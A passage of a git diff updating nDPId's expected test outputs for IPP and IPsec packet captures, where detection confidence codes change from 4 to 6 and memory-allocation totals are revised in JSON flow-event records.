~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 452 chars ~~ json string max len.......: 3629 chars 
diff --git a/test/results/ipp.pcap.out b/test/results/ipp.pcap.out
index 693d51f45..da3fd54a7 100644
--- a/test/results/ipp.pcap.out
+++ b/test/results/ipp.pcap.out
@@ -4,20 +4,20 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1210953938217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938217,"pkt":"ABJ5gGlgABtjmL82CABFAAA84QBAAEAGMHwKCgoxCgoK+9gtAnfcBg8oAAAAAKACFtBTiQAAAgQFtAQCCAoAa+4oAAAAAAEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1210953938217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938217,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8U54AAEAG\/d4KCgr7CgoKMQJ32C21dp4B3AYPKaASFtAViwAAAgQFtAEDAwABAQgKAFjtJABr7ig="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1210953938217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953938217,"pkt":"ABJ5gGlgABtjmL82CABFAAA04QFAAEAGMIMKCgoxCgoK+9gtAnfcBg8ptXaeAoAQAC5X7gAAAQEICgBr7isAWO0k"} -00997{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938217,"flow_last_seen":1210953938217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953938217,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"},"http": {"hostname":"10.10.10.251","url":"10.10.10.251\/ipp\/","code":0,"content_type":"","user_agent":"CUPS\/1.3.4"}} +00997{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938217,"flow_last_seen":1210953938217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953938217,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"},"http": {"hostname":"10.10.10.251","url":"10.10.10.251\/ipp\/","code":0,"content_type":"","user_agent":"CUPS\/1.3.4"}} 
00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953938235,"flow_last_seen":1210953938235,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953938235,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1210953938235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938235,"pkt":"ABJ5gGlgABtjmL82CABFAAA8xghAAEAGS3QKCgoxCgoK+9guAnfcdyg0AAAAAKACFtA59wAAAgQFtAQCCAoAa+48AAAAAAEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1210953938235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938235,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8U6wAAEAG\/dAKCgr7CgoKMQJ32C61d5gB3HcoNaASFtAB+AAAAgQFtAEDAwABAQgKAFjtJABr7jw="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1210953938235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953938235,"pkt":"ABJ5gGlgABtjmL82CABFAAA0xglAAEAGS3sKCgoxCgoK+9guAnfcdyg1tXeYAoAQAC5EXQAAAQEICgBr7j0AWO0k"} 
-00998{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938235,"flow_last_seen":1210953938236,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1210953938236,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"},"http": {"hostname":"10.10.10.251","url":"10.10.10.251\/ipp\/","code":0,"content_type":"","user_agent":"CUPS\/1.3.4"}} +00998{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938235,"flow_last_seen":1210953938236,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1210953938236,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"},"http": 
{"hostname":"10.10.10.251","url":"10.10.10.251\/ipp\/","code":0,"content_type":"","user_agent":"CUPS\/1.3.4"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953939430,"flow_last_seen":1210953939430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953939430,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1210953939430,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953939430,"pkt":"ABJ5gGlgABtjmL82CABFAAA8ASxAAEAGEFEKCgoxCgoK+9gvAnfdKfPLAAAAAKACFtBpAQAAAgQFtAQCCAoAa\/LnAAAAAAEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1210953939431,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953939431,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8VFQAAEAG\/SgKCgr7CgoKMQJ32C+1fm4B3SnzzKASFtBa+AAAAgQFtAEDAwABAQgKAFjtJwBr8uc="} 
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1210953939431,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953939431,"pkt":"ABJ5gGlgABtjmL82CABFAAA0AS1AAEAGEFgKCgoxCgoK+9gvAnfdKfPMtX5uAoAQAC6dXQAAAQEICgBr8ugAWO0n"} -00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953939430,"flow_last_seen":1210953939431,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953939431,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"},"http": {"hostname":"10.10.10.251","url":"10.10.10.251\/ipp\/","code":0,"content_type":"","user_agent":"CUPS\/1.3.4"}} 
-00920{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1210953938217,"flow_last_seen":1210953938237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":931,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"}} -00926{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":234,"flow_first_seen":1210953938235,"flow_last_seen":1210953939433,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2896,"flow_tot_l4_payload_len":227991,"flow_avg_l4_payload_len":974,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"}} 
-00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1210953939430,"flow_last_seen":1210953939492,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"}} +00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953939430,"flow_last_seen":1210953939431,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953939431,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"},"http": {"hostname":"10.10.10.251","url":"10.10.10.251\/ipp\/","code":0,"content_type":"","user_agent":"CUPS\/1.3.4"}} 
+00920{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1210953938217,"flow_last_seen":1210953938237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":931,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"}} +00926{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":234,"flow_first_seen":1210953938235,"flow_last_seen":1210953939433,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2896,"flow_tot_l4_payload_len":227991,"flow_avg_l4_payload_len":974,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"}} 
+00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1210953939430,"flow_last_seen":1210953939492,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.IPP","breed":"Acceptable","category":"System"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","packets-captured":279,"packets-processed":277,"total-skipped-flows":0,"total-l4-payload-len":230224,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1210953939492} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 279/277 
@@ -27,9 +27,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879803 bytes -~~ total memory freed........: 5879803 bytes -~~ total allocations/frees...: 118411/118411 +~~ total memory allocated....: 6013437 bytes +~~ total memory freed........: 6013437 bytes +~~ total allocations/frees...: 121173/121173 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 1004 chars diff --git a/test/results/ipsec_isakmp_esp.pcap.out b/test/results/ipsec_isakmp_esp.pcap.out index de102e773..c17130cff 100644 --- a/test/results/ipsec_isakmp_esp.pcap.out +++ b/test/results/ipsec_isakmp_esp.pcap.out 
@@ -2,242 +2,242 @@ 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946744635161} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946744635161,"flow_last_seen":946744635161,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946744635161,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946744635161,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946744635161,"pkt":"eJS0JASgYDjgxTWgCABFAANMRLRAAD8RBzLAqAJkbe27wTikEZQDOKGBAAAAALZO8yExpIlShrq9OQSIaVUuICMIAAAAAQAAAywjAAMQxP+M24ss5zxVviUOnYt8V91Yfad7H5TKYI1AzQJmVQ1775vqK4lAOGdGsvlvOkX2Namze+gxnoVLyUAsp8SwHxJQwtql3LAOZXSDDfTnjzJHUODCqYiBpOt6uikxP095kw8q3tMwzSSPxcuj7XnW6PzRBCGEtG5neD4sVk+l1JkUVcikyt4uOcC\/FA8QvmxhLpkegjtMpjAsxLE3vpMBtiZj+zT0jhYqc9k6vSPwaeAn85HWGyImbG4DzrmeTU5UQgHG42GPzTrJc4WLmObte9S00AsQVQ9A9LBK7HPddpmzlyoydy05a7OrcGa87mSenEZtlJg6Srp22ovHxgUAaNXH5mPObtMfqQ\/ZO07eMESAHqJ0a5Gd6IHROQKUZIGLAHdP0GpNPOgz2hcQhC5MCG8SlPoyqs7YHAhIq7dkn82ncfrQg5LG4rFBalatIKS6za3YCBaUd6HgjP76noPl8Do6aqlBwL8fyDSwzzm05t4rCUJTqDfHbdLklbf0nPbCgstxAP6c4hbiTTjn\/qk7utZRt9YQcbWpqDJcanmCdmb1nL0mJbhqNJKT0laV1UV3x3fjRglRQgmAhhs2hUSJo0d4NihfES7R2EorTgVqgQI4yo5XdLXhVuIgKP4Ku8zRjlfJmEVoLMy3a7RLdjn6RWIc0T1R9cczYK8i8MjgqoZquR76DAlISwr878UZk6Dw9jKHBkUClj00siMfCWOzBAbTMxpNKDHfy5dB\/OC4DjkU8Jx5Ww4kZ1bGo0YToz8QCnkfhb905KjwaC0BtYJKhTYqKepBpdMk1ABAYnlGAgpGml\/BnBm2gK1KR+5V00l\/SciWQJHFxEldf+2DOoJtw884NKtF1vFW7EhPfWqLyLXCFeo6LZks4jdktwG9EUQtt4BLPuvVyXAU3LtPeLt60tAwN\/SuEqqQh6CheihsGUzntaWNdK9vF\/rZwhofpjFdB6Jch8YOvyjSwYpP+j6pyZmT7Nw0n6FlxB2xOH4XiWJP3RrVBIW46wWavhUPTR1GC0LhX7Jubx5eaacA"} 
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946744635161,"flow_last_seen":946744635161,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946744635161,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946744635161,"flow_last_seen":946744635161,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946744635161,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00723{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946744635283,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946744635283,"pkt":"YDjgxTWgeJS0JASgCABFAADsdK0AAPcRYZht7bvBwKgCZBGUOKQA2OumAAAAALZO8yExpIlShrq9OQSIaVUuICMgAAAAAQAAAMwkAACwawmreKZrDBcIUTKWFfToFDg6qtDsyKKjgBXTNi4vJaEzwbhJuG171IwN4X7FupdGnYt8Co6xmRVm+RkdtKZ0NJmqeR\/qj\/G34eopZIcEsqB7nVGS9NkMVNQcB92DOLKkbkTpEypbftjCf9PGdG4jAg2e7K5fG1yC3G1wHKmrKsTWscrC+5r6aMrQIgOr0unE2oUc0o+Ct9Zb0Dqhj+nQky39U42OTCpKJsuUJg=="} 00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946744635838,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946744635838,"pkt":"eJS0JASgYDjgxTWgCABFAACMRLVAAD8RCfHAqAJkbe27wTikEZQAeEVsAAAAALZO8yExpIlShrq9OQSIaVUuICMIAAAAAgAAAGwwAABQsvg7Xs9r\/Ox3tq4oeDG2fCdsQnjxZd10Tk3TjbPgn+1YkpKifKhrE04HnKNVi6NO3zCXbR\/3wORB+UprbFsUQK+XhsAwdIy8g2ma9g=="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946744638499,"flow_last_seen":946744638499,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946744638499,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946744638499,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946744638499,"pkt":"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\/1lTuVX20pSg0wd78lahgWmI7UPYwEqg9jMZjDlZCMEiLmQFe0Un1oHlqRMr5bur0YWYOFmXhIDmbpuDdYYTe2FZk4UyxO9yQYqnlxava5Eb30fMpgELAKsnrnWauPFmg\/ND483cWUra4SbFJUPC2aT60GVqXpKQAAJFaYhWAzRgXwwxmmNCLSkHZjhcYvCGnbRY7q28HVKg1gKQAAHAAAQAQLrJ6w\/lRWK0YeWEq0E9E8QsTPBwAAABwAAEAFSiYt1ZZ+5yll6Yhny4WW51p\/IS8="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946744638499,"flow_last_seen":946744638499,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946744638499,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": 